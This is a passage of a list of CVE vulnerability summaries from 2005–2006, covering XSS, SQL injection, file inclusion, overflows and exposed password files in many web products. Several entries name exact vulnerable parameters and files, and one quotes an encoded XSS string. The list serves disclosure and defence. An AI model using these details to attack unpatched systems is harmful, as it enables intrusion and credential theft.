notepad parameter in a notepad action and (2) signature parameter in a editsig action. NOTE: These are different attack vectors, and probably a different vulnerability, than CVE-2006-0218 and CVE-2006-0219. [CVE-2006-0439] Text Rider 2.4 stores sensitive data in the data directory under the web document root with insufficient access control, which allows remote attackers to obtain usernames and password hashes by directly accessing data/userlist.txt. [CVE-2006-0437] Cross-site scripting (XSS) vulnerability in admin_smilies.php in phpBB 2.0.19 allows remote attackers to inject arbitrary web script or HTML via Javascript events such as "onmouseover" in the (1) smile_url or (2) smile_emotion parameters, which bypasses a check for "<" and ">" characters. [CVE-2006-0432] Unspecified vulnerability in BEA WebLogic Server and WebLogic Express 9.0, when an Administrator uses the WebLogic Administration Console to add custom security policies, causes incorrect policies to be created, which prevents the server from properly protecting JNDI resources. [CVE-2006-0431] Unspecified vulnerability in BEA WebLogic Server and WebLogic Express 8.1 SP5 allows untrusted applications to obtain the server's SSL identity via unknown attack vectors. [CVE-2006-0430] Certain configurations of BEA WebLogic Server and WebLogic Express 9.0, 8.1 through SP5, and 7.0 through SP6, when connection filters are enabled, cause the server to run more slowly, which makes it easier for remote attackers to cause a denial of service (server slowdown). [CVE-2006-0429] BEA WebLogic Server and WebLogic Express 9.0 causes new security providers to appear active even if they have not been activated by a server reboot, which could cause an administrator to perform inappropriate, security-relevant actions. [CVE-2006-0428] Unspecified vulnerability in BEA WebLogic Portal 8.1 SP3 through SP5, when using Web Services Remote Portlets (WSRP), allows remote attackers to access restricted web resources via crafted URLs. [CVE-2006-0427] Unspecified vulnerability in BEA WebLogic Server and WebLogic Express 9.0 and 8.1 through SP5 allows malicious EJBs or servlet applications to decrypt system passwords, possibly by accessing functionality that should have been restricted. [CVE-2006-0426] BEA WebLogic Server and WebLogic Express 8.1 through SP4, when configuration auditing is enabled and a password change occurs, stores the old and new passwords in cleartext in the DefaultAuditRecorder.log file, which could allow attackers to gain privileges. [CVE-2006-0425] BEA WebLogic Portal 8.1 through SP4 allows remote attackers to obtain the source for a deployment descriptor file via unknown vectors. [CVE-2006-0424] BEA WebLogic Server and WebLogic Express 8.1 through SP4, 7.0 through SP6, and 6.1 through SP7 allows remote authenticated guest users to read the server log and obtain sensitive configuration information. [CVE-2006-0423] BEA WebLogic Portal 8.1 through SP3 stores the password for the RDBMS Authentication provider in cleartext in the config.xml file, which allows attackers to gain privileges. [CVE-2006-0422] Multiple unspecified vulnerabilities in BEA WebLogic Server and WebLogic Express 8.1 through SP4, 7.0 through SP6, and 6.1 through SP7 allow remote attackers to access MBean attributes or cause an unspecified denial of service via unknown attack vectors. [CVE-2006-0421] By design, BEA WebLogic Server and WebLogic Express 7.0 and 6.1, when creating multiple domains from the same WebLogic instance on the same machine, allows administrators of any created domain to access other created domains, which could allow administrators to gain privileges that were not intended. [CVE-2006-0420] BEA WebLogic Server and WebLogic Express 8.1 through SP4 and 7.0 through SP6 does not properly handle when servlets use relative forwarding, which allows remote attackers to cause a denial of service (slowdown) via unknown attack vectors that cause "looping stack overflow errors." [CVE-2006-0419] BEA WebLogic Server and WebLogic Express 9.0, 8.1 through SP5, and 7.0 through SP6 allows anonymous binds to the embedded LDAP server, which allows remote attackers to read user entries or cause a denial of service (unspecified) via a large number of connections. [CVE-2006-0415] Cross-site scripting (XSS) vulnerability in index.php in SleeperChat 0.3f and earlier allows remote attackers to inject arbitrary web script or HTML via the pseudo parameter. [CVE-2006-0409] Cross-site scripting (XSS) vulnerability in index.php in Pixelpost Photoblog 1.4.3 allows remote attackers to inject arbitrary web script or HTML via the "Add Comment" field in a comment popup. [CVE-2006-0407] Cross-site scripting (XSS) vulnerability in post.php in AZ Bulletin Board (AZbb) 1.1.00 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) nickname parameter and (2) an iframe tag in the topic parameter. NOTE: the original disclosure specified the name parameter, but a correction was later provided. NOTE: followup posts have both disputed and confirmed the original claim. [CVE-2006-0404] Note-A-Day Weblog 2.2 stores sensitive data under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to archive/.phpass-admin, which contains encrypted passwords. [CVE-2006-0387] Stack-based buffer overflow in Safari in Mac OS X 10.4.5 and earlier, and 10.3.9 and earlier, allows remote attackers to execute arbitrary code via unspecified vectors involving a web page with crafted JavaScript, a different vulnerability than CVE-2005-4504. [CVE-2006-0378] Cross-site scripting (XSS) vulnerability in Netrix X-Site Manager allows remote attackers to inject arbitrary web script or HTML via the product_id parameter, as originally demonstrated for a custom mp3players_details.php program. NOTE: the name of the affected program might be installation-dependent, but it has been identified as "product_details.php" by some sources. [CVE-2006-0373] Cross-site scripting (XSS) vulnerability in register.aspx in Douran FollowWeb allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. NOTE: the provenance of this information is unknown [CVE-2006-0370] Noah Medling RCBlog 1.03 stores the data and config directories under the web root with insufficient access control, which allows remote attackers to view account names and MD5 password hashes. [CVE-2006-0367] Unspecified vulnerability in Cisco CallManager 3.2 and earlier, 3.3 before 3.3(5)SR1, 4.0 before 4.0(2a)SR2c, and 4.1 before 4.1(3)SR2 allows remote authenticated users with read-only administrative privileges to obtain full administrative privileges via a "crafted URL on the CCMAdmin web page." [CVE-2006-0366] Cross-site scripting (XSS) vulnerability in Phpclanwebsite (aka PCW) allows remote attackers to inject arbitrary web script or HTML via a javascript URI in a BBCode img tag. [CVE-2006-0365] Cross-site scripting (XSS) vulnerability in XMB (aka extreme message board) allows remote attackers to inject arbitrary web script or HTML via JavaScript in the SRC attribute of an IMG element. [CVE-2006-0364] Cross-site scripting (XSS) vulnerability in MyBulletinBoard (MyBB) allows remote attackers to inject arbitrary web script or HTML via a signature containing a JavaScript URI in the SRC attribute of an IMG element, in which the URI uses SGML numeric character references without trailing semicolons, as demonstrated by "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116". [CVE-2006-0361] Cross-site scripting (XSS) vulnerability in addcomment.php in Bit 5 Blog 8.01 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in an <a> tag in the comment parameter, which strips most tags but not <a>. [CVE-2006-0354] Cisco IOS before 12.3-7-JA2 on Aironet Wireless Access Points (WAP) allows remote authenticated users to cause a denial of service (termination of packet passing or termination of client connections) by sending the management interface a large number of spoofed ARP packets, which creates a large ARP table that exhausts memory, aka Bug ID CSCsc16644. [CVE-2006-0352] The default configuration of Fluffington FLog 1.01 installs users.0.dat under the web document root with insufficient access control, which might allow remote attackers to obtain sensitive information (login credentials) via a direct request. NOTE: It was later reported that 1.1.2 is also affected. [CVE-2006-0350] Cross-site scripting (XSS) vulnerability in eggblog 2.0 allow remote attackers to inject arbitrary web script or HTML via the message field to topic.php. [CVE-2006-0346] Cross-site scripting (XSS) vulnerability in SaralBlog 1.0 allows remote attackers to inject arbitrary web script or HTML via a website field in a new comment to view.php, which is not properly handled in the comment function in functions.php. [CVE-2006-0341] Cross-site scripting (XSS) vulnerability in WCONSOLE.DLL in Rockliffe MailSite 5.x and 6.1.22 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2006-0336] Kerio WinRoute Firewall before 6.1.4 Patch 2 allows attackers to cause a denial of service (CPU consumption and hang) via unknown vectors involving "browsing the web". [CVE-2006-0334] Cross-site scripting (XSS) vulnerability in search.php in My Amazon Store Manager 1.0 allows remote attackers to inject arbitrary web script or HTML via the Keywords parameter. NOTE: some sources claim that the affected parameter is "q", but the only public archive of the original researcher notification shows an XSS manipulation in "Keywords". [CVE-2006-0333] Cross-site scripting (XSS) vulnerability in ar-blog 5.2 allows remote attackers to inject arbitrary web script or HTML via the (1) month or (2) year parameter to index.php. [CVE-2006-0330] Cross-site scripting (XSS) vulnerability in Gallery before 1.5.2 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, possibly involving the user name (fullname). [CVE-2006-0325] Etomite Content Management System 0.6, and possibly earlier versions, when downloaded from the web site in January 2006 after January 10, contains a back door in manager/includes/todo.inc.php, which allows remote attackers to execute arbitrary commands via the "cij" parameter. [CVE-2006-0324] SQL injection vulnerability in WebspotBlogging 3.0 allows remote attackers to execute arbitrary SQL commands and bypass authentication via the username parameter to login.php. [CVE-2006-0317] Cross-site scripting (XSS) vulnerability in rkrt_stats.php in RedKernel Referrer Tracker 1.1.0-3 allows remote attackers to inject arbitrary web script or HTML via a query string value as a GET, which is stored in the $QUERY_STRING variable. NOTE: the provenance of this information is unknown [CVE-2006-0299] The E4X implementation in Mozilla Firefox before 1.5.0.1, Thunderbird 1.5 if running Javascript in mail, and SeaMonkey before 1.0 exposes the internal "AnyName" object to external interfaces, which allows multiple cooperating domains to exchange information in violation of the same origin restrictions. [CVE-2006-0295] Mozilla Firefox 1.5, Thunderbird 1.5 if Javascript is enabled in mail, and SeaMonkey before 1.0 might allow remote attackers to execute arbitrary code via the QueryInterface method of the built-in Location and Navigator objects, which leads to memory corruption. [CVE-2006-0265] Multiple unspecified vulnerabilities in Oracle Database server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and 10.2.0.1 have unspecified impact and attack vectors, as identified by Oracle Vuln# (1) DB17 in the Oracle Text component and (2) DB18 in the Program Interface Network component. NOTE: details are unavailable from Oracle, but they have not publicly disputed a claim by a reliable independent researcher that states that DB17 involves SQL injection in the (a) VALIDATE_STATEMENT and BUILD_DML functions in CTXSYS.DRILOAD [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer. [CVE-2006-0251] Cross-site scripting (XSS) vulnerability in fom.cgi in Faq-O-Matic 2.711 allows remote attackers to inject arbitrary web script or HTML via the (1) _duration, (2) file, and (3) cmd parameters. [CVE-2006-0248] Virata-EmWeb web server 6_1_0, as used in (1) Intracom JetSpeed 500 and 520 and (2) Allied Data Technologies CopperJet 811 RouterPlus, allows remote attackers to access privileged information, such as user lists and configuration settings, via direct HTTP requests. [CVE-2006-0247] Cross-site scripting (XSS) vulnerability in anyboard.cgi in Netbula Anyboard 9.9 and earlier allows remote attackers to inject arbitrary web script or HTML via the tK parameter in a find command. [CVE-2006-0246] Cross-site scripting (XSS) vulnerability in down.pl in Widexl Download Tracker 1.06 allows remote attackers to inject arbitrary web script or HTML via the ID parameter. [CVE-2006-0245] Multiple cross-site scripting (XSS) vulnerabilities in CubeCart 3.0.7-pl1 allow remote attackers to inject arbitrary web script or HTML via the (3) redir, (4) productId, (5) docId, (6) act, and (7) catId parameters in index.php [CVE-2006-0244] * DISPUTED ** Directory traversal vulnerability in workspaces.php in phpXplorer 0.9.33 allows remote attackers to include arbitrary files via a .. (dot dot) and trailing null byte (%00) in the sShare parameter. NOTE: a followup post claims that this is not a vulnerability since the functionality of phpXplorer supports the upload of PHP files, which would not cross privilege boundaries since the PHP functionality would support read access outside the web root. [CVE-2006-0243] Cross-site scripting (XSS) vulnerability in SMBCMS 2.1 allows remote attackers to inject arbitrary web script or HTML via the text parameter, which is used by the "Search Site" field. NOTE: the provenance of this information is unknown [CVE-2006-0242] Cross-site scripting vulnerability in index.php in PHP Fusebox 4.0.6 allows remote attackers to inject arbitrary web script or HTML via the fuseaction parameter. [CVE-2006-0241] Cross-site scripting vulnerability in WBNews 1.1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the Name field. [CVE-2006-0239] Multiple cross-site scripting (XSS) vulnerabilities in Simple Blog 2.1 allow remote attackers to inject arbitrary web script or HTML via (1) a comment to comments.asp and (2) possibly certain other fields in unspecified scripts. [CVE-2006-0237] Cross-site scripting (XSS) vulnerability in index.php in GTP iCommerce allows remote attackers to inject arbitrary web script or HTML via the (1) cat and (2) subcat parameters. NOTE: the provenance of this information is unknown [CVE-2006-0233] Cross-site scripting (XSS) vulnerability in functions.php in microBlog 2.0 RC-10 allows remote attackers to inject arbitrary web script and HTML via a javascript: URI in a [url] BBcode tag. [CVE-2006-0232] Symantec Scan Engine 5.0.0.24, and possibly other versions before 5.1.0.7, stores sensitive log and virus definition files under the web root with insufficient access control, which allows remote attackers to obtain the information via direct requests. [CVE-2006-0222] Cross-site scripting (XSS) vulnerability in fullview.php in AlstraSoft Template Seller Pro allows remote attackers to inject arbitrary web script or HTML via the tempid parameter. [CVE-2006-0220] Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal 5.3 through 6.1.1 allow remote attackers to inject arbitrary web script or HTML via (1) the day parameter in calendar.php and (2) the input form in search.php. NOTE: the provenance of this information is unknown [CVE-2006-0217] Multiple cross-site scripting (XSS) vulnerabilities in Ultimate Auction 3.67 allow remote attackers to inject arbitrary web script or HTML via the (1) item parameter in item.pl and (2) category parameter in itemlist.pl, which reflects the XSS in an error message. NOTE: the affected version might be wrong since the current version as of 20060116 is 3.6.1. [CVE-2006-0215] Cross-site scripting (XSS) vulnerability in admin.php in QualityEBiz Quality PPC (QPPC) 1.0 build 1644 allows remote attackers to inject arbitrary web script or HTML via the cpage parameter. NOTE: this issue might be resultant from CVE-2006-0216. [CVE-2006-0211] Cross-site scripting (XSS) vulnerability in forgotPassword.asp in Helm Hosting Control Panel 3.2.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the txtEmailAddress parameter. [CVE-2006-0210] Cross-site scripting (XSS) vulnerability in index.php in Interspire TrackPoint NX before 0.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter when using the Login page. [CVE-2006-0208] Multiple cross-site scripting (XSS) vulnerabilities in PHP 4.4.1 and 5.1.1, when display_errors and html_errors are on, allow remote attackers to inject arbitrary web script or HTML via inputs to PHP applications that are not filtered when they are included in the resulting error message. [CVE-2006-0204] Multiple cross-site scripting (XSS) vulnerabilities in Wordcircle 2.17 allow remote attackers to inject arbitrary web script or HTML via (1) the "Course name" field in index.php when the frm parameter has the value "mine" and (2) possibly certain other fields in unspecified scripts. [CVE-2006-0202] Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50 and possibly earlier has (1) world-readable permissions for ipn/logs/ipn_success.txt, which allows local users to view sensitive information (payment data), and (2) world-writable permissions for ipn/logs, which allows local users to delete or replace payment data. [CVE-2006-0201] Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. [CVE-2006-0198] Cross-site scripting (XSS) vulnerability in a certain module, possibly poll or Pool, for XOOPS allows remote attackers to inject arbitrary web script or HTML via JavaScript in the SRC attribute of an IMG element in a comment. [CVE-2006-0195] Interpretation conflict in the MagicHTML filter in SquirrelMail 1.4.0 to 1.4.5 allows remote attackers to conduct cross-site scripting (XSS) attacks via style sheet specifiers with invalid (1) "/" and "/" comments, or (2) a newline in a "url" specifier, which is processed by certain web browsers including Internet Explorer. [CVE-2006-0194] Cross-site scripting (XSS) vulnerability in default.asp in FogBugz 4.029, and other versions before 4.0.33, allows remote attackers to inject arbitrary web script or HTML via the dest parameter in the pgLogon page. [CVE-2006-0193] Cross-site scripting (XSS) vulnerability in the Hosting Control Panel (psoft.hsphere.CP) in Positive Software H-Sphere 2.4.3 Patch 8 and earlier allows remote attackers to inject arbitrary web script or HTML via the login parameter in a login action. [CVE-2006-0188] webmail.php in SquirrelMail 1.4.0 to 1.4.5 allows remote attackers to inject arbitrary web pages into the right frame via a URL in the right_frame parameter. NOTE: this has been called a cross-site scripting (XSS) issue, but it is different than what is normally identified as XSS. [CVE-2006-0185] Multiple cross-site scripting vulnerabilities in the (1) Pool or (2) News Modules in Php-Nuke allow remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of an IMG tag. [CVE-2006-0180] Cross-site scripting (XSS) vulnerability in CaLogic Calendars 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the Title field on the "Adding New Event" page, and possibly other vectors, involving iframe tags. [CVE-2006-0175] Cross-site scripting (XSS) vulnerability in search_form.asp in Web Wiz Forums 6.34 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2006-0172] Cross-site scripting (XSS) vulnerability in the file manager utility in Hummingbird Collaboration (aka Hummingbird Enterprise Collaboration) 5.21 and earlier allows remote attackers to inject arbitrary web script or HTML in an uploaded page, which is published without a check for hostile scripting. [CVE-2006-0171] PHP remote file include vulnerability in index.php in OrjinWeb E-commerce allows remote attackers to execute arbitrary code via a URL in the page parameter. NOTE: it is not clear, but OrjinWeb might be an application service, in which case it should not be included in CVE. [CVE-2006-0168] Cross-site scripting (XSS) vulnerability in MyPhPim 01.05 allows remote attackers to inject arbitrary web script or HTML via the description field on the "Create New todo" page. [CVE-2006-0165] Cross-site scripting (XSS) vulnerability in the DataForm Entries functionality in Plain Black WebGUI before 6.8.4 (gamma) allows remote attackers to inject arbitrary Javascript via the (1) url and (2) name field of the default email form. [CVE-2006-0152] Cross-site scripting (XSS) in search_result.php in phpChamber 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the needle parameter. NOTE: the provenance of this information is unknown [CVE-2006-0149] Cross-site scripting (XSS) vulnerability in SimpBook 1.0, with html_enable on (the default), allows remote attackers to inject arbitrary web script or HTML via the message field. [CVE-2006-0142] Cross-site scripting (XSS) vulnerability in andromeda.php in Andromeda 1.9.3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the s parameter. NOTE: the provenance of this information is unknown [CVE-2006-0140] Cross-site scripting (XSS) vulnerability in post.php in NavBoard V16 Stable(2.6.0) and V17beta2 allows remote attackers to inject arbitrary web script or HTML via the (1) b, (2) textlarge, and (3) url bbcode tags. [CVE-2006-0137] SQL injection vulnerability in linkcategory.php in Phanatic Softwares Chimera Web Portal System 0.2 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2006-0136] Multiple cross-site scripting (XSS) vulnerabilities in the guestbook module in modules.php in Phanatic Softwares Chimera Web Portal System 0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) comment_poster, (2) comment_poster_email, (3) comment_poster_homepage, and (4) comment_text parameters. [CVE-2006-0135] SQL injection vulnerability in login.php in TheWebForum (twf) 1.2.1 allows remote attackers to execute arbitrary SQL commands and bypass login authentication via the username parameter (aka the u variable). [CVE-2006-0134] Cross-site scripting (XSS) vulnerability in register.php in TheWebForum (twf) 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the www parameter. [CVE-2006-0132] Directory traversal vulnerability in webftp.php in SysCP WebFTP 1.2.6 and possibly earlier allows remote attackers to include and execute arbitrary local PHP scripts, and possibly read other types of files, via a .. (dot dot) and a trailing null in the webftp_language parameter. [CVE-2006-0124] Cross-site scripting (XSS) vulnerability in crear.php in ADN Forum 1.0b allows remote attackers to inject arbitrary web script or HTML via the titulo parameter, which is used by the "Topic name" field. [CVE-2006-0122] Cross-site scripting (XSS) vulnerability in Public/Index.asp in Aquifer CMS allows remote attackers to inject arbitrary web script or HTML via the Keyword parameter. [CVE-2006-0119] Multiple unspecified vulnerabilities in IBM Lotus Notes and Domino Server before 6.5.5 have unknown impact and attack vectors, due to "potential security issues" as identified by SPR numbers (1) GPKS6C9J67 in Agents, (2) JGAN6B6TZ3 and (3) KSPR699NBP in the Router, (4) GPKS5YQGPT in Security, or (5) HSAO6BNL6Y in the Web Server. NOTE: vector 3 is related to an issue in NROUTER in IBM Lotus Notes and Domino Server before 6.5.4 FP1, 6.5.5, and 7.0, which allows remote attackers to cause a denial of service (CPU consumption) via a crafted vCal meeting request sent via SMTP (aka SPR# KSPR699NBP). [CVE-2006-0116] Cross-site scripting vulnerability search.inetstore in iNETstore Ebusiness Software 2.0 allows remote attackers to inject arbitrary web script or HTML via the searchterm parameter. [CVE-2006-0112] Cross-site scripting (XSS) vulnerability in index.php in Enhanced Simple PHP Gallery 1.7 allows remote attackers to inject arbitrary web script or HTML via the dir parameter. [CVE-2006-0111] Cross-site scripting vulnerability in index.php in Boxcar Media Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the (1) parent or (2) pg parameter. [CVE-2006-0110] Cross-site scripting (XSS) vulnerability in escribir.php in Foro Domus 2.10 allows remote attackers to inject arbitrary web script via the email parameter. [CVE-2006-0109] Cross-site scripting vulnerability in category.php in Modular Merchant Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2006-0103] TinyPHPForum 3.6 and earlier stores the (1) users/[USERNAME].hash and (2) users/[USERNAME].email files under the web root with insufficient access control, which allows remote attackers to list all registered users and possibly obtain other sensitive information. [CVE-2006-0102] Cross-site scripting (XSS) vulnerability in TinyPHPForum (TPF) 3.6 and earlier allows remote attackers to inject arbitrary web script via a javascript: scheme in an "[a]" bbcode tag, possibly the txt parameter to action.php. [CVE-2006-0101] Multiple cross-site scripting (XSS) vulnerabilities in sBLOG 0.7.1 Beta 20051202 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) p and (2) keyword parameters in (a) index.php and (b) search.php. [CVE-2006-0093] Cross-site scripting (XSS) vulnerability in index.php in @Card ME PHP allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2006-0091] Cross-site scripting (XSS) vulnerability in webmail in Open-Xchange 0.8.1-6 and earlier, with "Inline HTML" enabled, allows remote attackers to inject arbitrary web script or HTML via e-mail attachments, which are rendered inline. [CVE-2006-0086] Cross-site scripting vulnerability in index.php in Next Generation Image Gallery 0.0.1 Lite Edition allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-0084] Cross-site scripting vulnerability in index.php in raSMP 2.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the $_SERVER[HTTP_USER_AGENT] variable (User-Agent header). [CVE-2006-0080] Cross-site scripting (XSS) vulnerability in vBulletin 3.5.2, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the title of an event, which is not properly filtered by (1) calendar.php and (2) reminder.php. [CVE-2006-0078] Multiple cross-site scripting (XSS) vulnerabilities in B-net Software 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) shout variables to (a) shout.php, or the (3) title and (4) message variables to (b) guestbook.php. [CVE-2006-0073] Cross-site scripting (XSS) vulnerability in DiscusWare Discus Freeware 3.10.5 and Professional 3.10.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in a URL, which is not properly sanitized from the resulting error message. NOTE: the provenance of this information is unknown [CVE-2006-0069] Cross-site scripting (XSS) vulnerability in addentry.php in Chipmunk Guestbook 1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the homepage parameter. [CVE-2006-0065] SQL injection vulnerability in (1) functions.php, (2) functions_update.php, and (3) functions_display.php in VEGO Web Forum 1.26 and earlier allows remote attackers to execute arbitrary SQL commands via the theme_id parameter in index.php. [CVE-2006-0063] Cross-site scripting (XSS) vulnerability in phpBB 2.0.19, when "Allowed HTML tags" is enabled, allows remote attackers to inject arbitrary web script or HTML via a permitted HTML tag with ' (single quote) characters and active attributes such as onmouseover, a variant of CVE-2005-4357. [CVE-2006-0044] Unspecified vulnerability in context.py in Albatross web application toolkit before 1.33 allows remote attackers to execute arbitrary commands via unspecified vectors involving template files and the "handling of submitted form fields". [CVE-2006-0032] Cross-site scripting (XSS) vulnerability in the Indexing Service in Microsoft Windows 2000, XP, and Server 2003, when the Encoding option is set to Auto Select, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL, which is injected into an error message whose charset is set to UTF-7. [CVE-2006-0015] Cross-site scripting (XSS) vulnerability in _vti_bin/_vti_adm/fpadmdll.dll in Microsoft FrontPage Server Extensions 2002 and SharePoint Team Services allows remote attackers to inject arbitrary web script or HTML, then leverage the attack to execute arbitrary programs or create new accounts, via the (1) operation, (2) command, and (3) name parameters. [CVE-2006-0013] Buffer overflow in the Web Client service (WebClnt.dll) for Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote authenticated users or Guests to execute arbitrary code via crafted RPC requests, a different vulnerability than CVE-2005-1207. [CVE-2006-0010] Heap-based buffer overflow in T2EMBED.DLL in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1, Windows 98, and Windows ME allows remote attackers to execute arbitrary code via an e-mail message or web page with a crafted Embedded Open Type (EOT) web font that triggers the overflow during decompression. [CVE-2005-4880] Jax Guestbook 3.1 and 3.31 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain IP addresses of users via a direct request to (1) guestbook, (2) guestbook_ips2block, (3) ips2block, and (4) formmailer/logfile.csv. [CVE-2005-4879] Multiple cross-site scripting (XSS) vulnerabilities in jax_guestbook.php in Jax Guestbook 3.1 and 3.31 allow remote attackers to inject arbitrary web script or HTML via the (1) gmt_ofs and (2) language parameters. NOTE: the page parameter is already covered by CVE-2006-1913. NOTE: it was later reported that 3.50 is also affected. [CVE-2005-4878] Multiple cross-site scripting (XSS) vulnerabilities in (1) acid_qry_main.php in Analysis Console for Intrusion Databases (ACID) 0.9.6b20 and (2) base_qry_main.php in Basic Analysis and Security Engine (BASE) 1.2, and unspecified other console scripts in these products, allow remote attackers to inject arbitrary web script or HTML via the sig[1] parameter and possibly other parameters, a different vulnerability than CVE-2007-6156. [CVE-2005-4877] Cross-site scripting (XSS) vulnerability in the login form (login.jsp) of the admin console in Openfire (formerly Wildfire) 2.3.0 Beta 2 allows remote attackers to inject arbitrary web script or HTML via Javascript events in the username parameter, a different vulnerability than CVE-2005-4876. [CVE-2005-4876] Cross-site scripting (XSS) vulnerability in the login form (login.jsp) of the admin console in Openfire (formerly Wildfire) 2.2.2, and possibly other versions before 2.3.0 Beta 2, allows remote attackers to inject arbitrary web script or HTML via the username parameter, a different vulnerability than CVE-2005-4877. [CVE-2005-4874] The XMLHttpRequest object in Mozilla 1.7.8 supports the HTTP TRACE method, which allows remote attackers to obtain (1) proxy authentication passwords via a request with a "Max-Forwards: 0" header or (2) arbitrary local passwords on the web server that hosts this object. [CVE-2005-4859] mimicboard2 (Mimic2) 086 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for mimic2.dat. [CVE-2005-4858] Multiple cross-site scripting (XSS) vulnerabilities in mimic2.cgi in mimicboard2 (Mimic2) 086 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified parameters associated with the (1) name, (2) title, and (3) comment sections, as demonstrated by referencing a remote document through the SRC attribute of an IFRAME element. [CVE-2005-4856] The admin interface in eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051110 does not properly handle authorization errors, which allows remote attackers to obtain sensitive information and see the admin pagelayout and associated templates via a request with (1) "anything after the url" or (2) a "wrong url". [CVE-2005-4838] Multiple cross-site scripting (XSS) vulnerabilities in the example web applications for Jakarta Tomcat 5.5.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) el/functions.jsp, (2) el/implicit-objects.jsp, and (3) jspx/textRotate.jspx in examples/jsp2/, as demonstrated via script in a request to snp/snoop.jsp. NOTE: other XSS issues in the manager were simultaneously reported, but these require admin access and do not cross privilege boundaries. [CVE-2005-4835] The ath_rate_sample function in the ath_rate/sample/sample.c sample code in MadWifi before 0.9.3 allows remote attackers to cause a denial of service (failed KASSERT and system crash) by moving a connected system to a location with low signal strength, and possibly other vectors related to a race condition between interface enabling and packet transmission. [CVE-2005-4834] IBM WebSphere Application Server (WAS) 5.0.2.5 through 5.1.1.3 allows remote attackers to obtain JSP source code and other sensitive information, related to incorrect request processing by the web container. [CVE-2005-4833] IBM WebSphere Application Server (WAS) 6.0 before 20050201, when serving pages in an Application WAR or an Extended Document Root, allows remote attackers to obtain the JSP source code and other sensitive information via "a specific JSP URL," related to lack of normalization of the URL format. [CVE-2005-4824] PHP remote file inclusion vulnerability in web/classes.php in Siteframe before 3.2.2 allows remote attackers to execute arbitrary PHP code via a URL in the LOCAL_PATH parameter, a different vulnerability than CVE-2005-1965. [CVE-2005-4823] Buffer overflow in the HP HTTP Server 5.0 through 5.95 of the HP Web-enabled Management Software allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2005-4819] Cross-site scripting (XSS) vulnerability in Lotus Domino versions before 6.5.4 fix pack 1 (FP1) and versions before 7.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-4806] Multiple unspecified vulnerabilities in Sun Java System Web Proxy Server 3.6 SP7 and earlier allow remote attackers to cause a denial of service (unresponsive service) via unknown vectors. [CVE-2005-4804] Unspecified vulnerability in Sun Java System Application Server Platform Edition and Enterprise Edition 8.1 2005 Q1, and Platform Edition UR1, allows remote attackers to read .jar files via unknown vectors related to deployed web applications. [CVE-2005-4801] Multiple cross-site request forgery (CSRF) vulnerabilities in Yet Another PHP Image Gallery (YaPIG) 0.95b and earlier allow remote attackers to perform unauthorized actions as a logged-in user, as demonstrated by tricking the administrator to access a web page that performs a mod_info action in modify_gallery.php. [CVE-2005-4799] Multiple cross-site scripting (XSS) vulnerabilities in Yet Another PHP Image Gallery (YaPIG) 0.95b and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the Homepage field (aka the Website field) in an "image-related comment" and (2) the img_size field in view.php. NOTE: due to lack of details from the researcher, it is not clear whether the comment vector overlaps CVE-2005-1886. [CVE-2005-4793] Multiple unspecified vulnerabilities in the web utility function in Hitachi Cm2/Network Node Manager and JP1/Cm2/Network Node Manager before 20050930 allow attackers to execute arbitrary commands, disable services, and "exploit vulnerabilities." [CVE-2005-4792] SQL injection vulnerability in index.php in Appalachian State University phpWebSite 0.10.1 and earlier allows remote attackers to execute arbitrary SQL commands via the module parameter. NOTE: the provenance of this information is unknown [CVE-2005-4789] resmgr in SUSE Linux 9.2 and 9.3, and possibly other distributions, does not properly enforce class-specific exclude rules in some situations, which allows local users to bypass intended access restrictions for USB devices that set their class ID at the interface level. [CVE-2005-4787] DISPUTED Turnkey Web Tools SunShop Shopping Cart allows remote attackers to obtain sensitive information via a phpinfo action to (1) index.php, (2) admin/index.php, and (3) 